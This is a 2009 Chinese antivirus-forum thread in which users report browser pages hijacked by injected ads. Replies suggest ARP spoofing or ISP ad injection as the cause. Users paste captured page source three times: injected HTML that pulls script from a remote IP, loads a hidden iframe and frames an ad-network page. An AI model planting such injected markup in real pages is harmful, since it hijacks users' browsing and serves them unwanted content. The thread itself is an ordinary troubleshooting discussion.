»
游客:
注册
|
登录
|
帮助
微点交流论坛
»
反病毒
» 我使用360浏览器也中毒了微点没有自动查出来
作者:
标题: 我使用360浏览器也中毒了微点没有自动查出来
qsfan
新手上路
积分 2
发帖 2
注册 2009-11-6
#1
我使用360浏览器也中毒了微点没有自动查出来
1、2009-11-10这个截图是访问骑士饭网站时候360浏览器出现的截图!
2、2009-11-11这个是访问百度贴吧时使用360浏览器出现的截图
http://mpicture.micropoint.com.c ... c68b02bca0855a43890
昨晚天我已经提交技术文件分析,得出结论是网站没有中毒。
据我今晚的那个网页的截图发现属于我个人电脑中毒导致的!
请微点技术人员提供给我帮助解决我现在这个病毒,先谢谢了!
下边附带我出现的网页时候的查看源代码
2009-11-10
Quote:
<html><head><title></title><link rel="stylesheet" type="text/css" href="http://218.25.246.117:80/2.css"><script type="text/javascript">var g="http://www.qsfan.com";var location;window.onerror=function(){document.URL=g;}</script><script type="text/javascript" src="http://218.25.246.117:80/2.js"></script></head><body id=b rightMargin=0 topMargin=0 leftMargin=0 scroll=no><iframe src="http://218.25.246.117:80/a/p?s=1275316492" style="display:none"></iframe><div id=floatAd style="z-index: 5;position:absolute;left=20;right:20;top:20;width:640px;height:480px;"><div id=movebar onMousedown="handleMouseDown(event)" onmouseover="handleMouseUp(event)" align="right" ><iframe class="shadow"></iframe><span id=close onclick="h()" title="Close"><a href="#" onclick="h()">x</a></span></div><div id=innerAd><iframe src="http://www.cnetad.cn/union.php?id=279" width=100% height=100% frameborder=0 scrolling=auto></iframe></div></div> <iframe name=cn src="javascript:parent.w" width=100% height=100% frameborder=0 scrolling=auto></iframe></body><script type="text/javascript">f(1);</script></html>
2009-11-11
Quote:
<html><head><title></title><link rel="stylesheet" type="text/css" href="http://218.25.246.117:80/2.css"><script type="text/javascript">var g="http://tieba.baidu.com";var location;window.onerror=function(){document.URL=g;}</script><script type="text/javascript" src="http://218.25.246.117:80/2.js"></script></head><body id=b rightMargin=0 topMargin=0 leftMargin=0 scroll=no><iframe src="http://218.25.246.117:80/a/p?s=1275538455" style="display:none"></iframe><div id=floatAd style="z-index: 5;position:absolute;left=20;right:20;top:20;width:640px;height:480px;"><div id=movebar onMousedown="handleMouseDown(event)" onmouseover="handleMouseUp(event)" align="right" ><iframe class="shadow"></iframe><span id=close onclick="h()" title="Close"><a href="#" onclick="h()">x</a></span></div><div id=innerAd><iframe src="http://www.cnetad.cn/union.php?id=279" width=100% height=100% frameborder=0 scrolling=auto></iframe></div></div> <iframe name=cn src="javascript:parent.w" width=100% height=100% frameborder=0 scrolling=auto></iframe></body><script type="text/javascript">f(1);</script></html>
期待答案!!
※ ※ ※ 本文纯属【qsfan】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-11 18:49
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
#2
请楼主通过论坛短消息的方式给我们发送一下您的邮件地址,便于我们跟踪处理。谢谢您的反馈。
※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※
微点官方认证新浪微博:欢迎进入
微点新浪微博
微点技术支持邮箱:
support@micropoint.com.cn
给Legend发短消息
2009-11-11 19:00
qsfan
新手上路
积分 2
发帖 2
注册 2009-11-6
#3
感谢超版的及时回答,邮件已经给你发了,期待答案!
※ ※ ※ 本文纯属【qsfan】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-11 19:17
jaber
版主
使用与技巧区版主
积分 2861
发帖 2835
注册 2006-6-6
#4
楼主你不会是在局域网吧,感觉有点像ARP攻击,你用微点的防火墙绑定下MAC试试
※ ※ ※ 本文纯属【jaber】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
XP2(原版未打补丁)
单独微点预升级
2009-11-12 09:25
images
银牌会员
积分 1429
发帖 1376
注册 2007-11-17
#5
楼主直接访问百度首页试试看,是否也有这个现象,怀疑楼主的网络中存在arp欺骗;
建议使用微点的绑定mac地址功能把你本地网关的mac地址绑定试试看。
或者你在本机的ms-dos中查看下arp -a看看是否你的网关mac地址那里总是发生变化。
※ ※ ※ 本文纯属【images】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
All accepted English
For a slim figure, share your food with the hungry.
给images发短消息
2009-11-12 09:26
x147369
新手上路
积分 2
发帖 2
注册 2009-11-12
#6
我也中了这个病毒 怎么解决啊
※ ※ ※ 本文纯属【x147369】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-12 23:13
Legend
超级版主
超级版主
积分 77171
发帖 70170
注册 2005-10-29
#7
Quote:
Originally posted by
x147369
at 2009-11-12 23:13:
我也中了这个病毒 怎么解决啊
请加微点软件技术交流群管理员qq:466248167帮您具体分析下。
※文章所有权归【Legend】与【东方微点论坛】共同所有,转载请注明出处!※
微点官方认证新浪微博:欢迎进入
微点新浪微博
微点技术支持邮箱:
support@micropoint.com.cn
给Legend发短消息
2009-11-12 23:15
x147369
新手上路
积分 2
发帖 2
注册 2009-11-12
#8
<html><head><title></title><link rel="stylesheet" type="text/css" href="http://218.25.246.117:80/2.css"><script type="text/javascript">var g="
http://news.baidu.com/
";var location;window.onerror=function(){document.URL=g;}</script><script type="text/javascript" src="http://218.25.246.117:80/2.js"></script></head><body id=b rightMargin=0 topMargin=0 leftMargin=0 scroll=no><iframe src="http://218.25.246.117:80/a/p?s=1277481768" style="display:none"></iframe><div id=floatAd style="z-index: 5;position:absolute;left=20;right:20;top:20;width:640px;height:480px;"><div id=movebar onMousedown="handleMouseDown(event)" onmouseover="handleMouseUp(event)" align="right" ><iframe class="shadow"></iframe><span id=close onclick="h()" title="Close"><a href="#" onclick="h()">x</a></span></div><div id=innerAd><iframe src="http://www.cnetad.cn/union.php?id=279" width=100% height=100% frameborder=0 scrolling=auto></iframe></div></div> <iframe name=cn src="javascript:parent.w" width=100% height=100% frameborder=0 scrolling=auto></iframe></body><script type="text/javascript">f(1);</script></html>
插入下划线的是我进的网址
※ ※ ※ 本文纯属【x147369】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-12 23:16
error55
新手上路
积分 2
发帖 2
注册 2009-11-14
#9
http://www.firefox.net.cn/forum/viewtopic.php?p=222925#222925
我也碰到了,经过排查和数天的HTTP跟踪,现在我觉得最大的可能是被联通的ADSL服务器篡改了HTML代码,也就是通常所说的“ADSL推送式广告”。
大致原理就是当你访问任何网站时,你的HTTP请求刚到达ADSL服务器,ADSL服务器直接将预设的跳转代码返回给你,你就被劫持到他们想让你去的广告网站。
前几天是被劫持到 cnetad.cn 这个网站广告联盟(
http://www.cnetad.cn/union.php?id=xxx
),
最近几天是被劫持到 adsorg.com.cn 这个网站广告联盟(
http://www.adsorg.com.cn/union.php?id=xxx
)
所谓广告联盟就是说它每次显示的广告是不同的。
当然它也不是每次HTTP请求都篡改,有一定的频率,比如几个小时篡改一次,这样比较容易隐蔽,也容易推托责任,让你以为是你的机器中了毒才乱弹广告的。
而且发现这两个广告联盟采用的广告平台居然都是 ADPower 这款系统。
网上很多人都碰到了这个流氓,最近很火:
http://www.im286.com/thread-3957640-1-1.html
http://space.im286.com/thread-4079586-1-1.html
http://baike.360.cn/4005462/31560442.html
http://bbs.micropoint.com.cn/showthread.asp?tid=61131
http://bbs.duba.net/thread-22110899-1-1.html
http://bbs.360safe.com/viewthread.php?tid=584738
http://bbs.ikaka.com/showtopic-8565806.aspx
我衷心的预祝联通公司早日倒闭!
预祝 cnetad.cn(南京讯悦信息技术有限公司)早日倒闭!
预祝 adsorg.com.cn(北京新网数码信息技术有限公司)早日倒闭!
预祝 ADPower (珠海麒润网络科技有限公司)早日倒闭!
※ ※ ※ 本文纯属【error55】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-14 20:39
error55
新手上路
积分 2
发帖 2
注册 2009-11-14
#10
打电话投诉这些垃圾服务商!
※ ※ ※ 本文纯属【error55】个人意见,与【 微点交流论坛 】立场无关※ ※ ※
2009-11-14 20:40
论坛跳转:
微点软件公测区
安全快报
> 病毒快报
> 漏洞快报
微点产品在线技术支持
> 微点主动防御软件
> 预升级反馈专区
> 微点杀毒软件
微点用户交流区
> 微点新闻
> 微点软件使用交流
> 微点茶室
安全技术交流区
> 主动防御
> 反病毒
> 防火墙
综合区
> 电脑&数码
> 体育&娱乐&休闲
> 灌水区
版务管理
内部使用专区
可打印版本
|
推荐
|
订阅
|
收藏
[
联系我们
-
东方微点
]
北京东方微点信息技术有限责任公司 福建东方微点信息安全有限责任公司
闽ICP备05030815号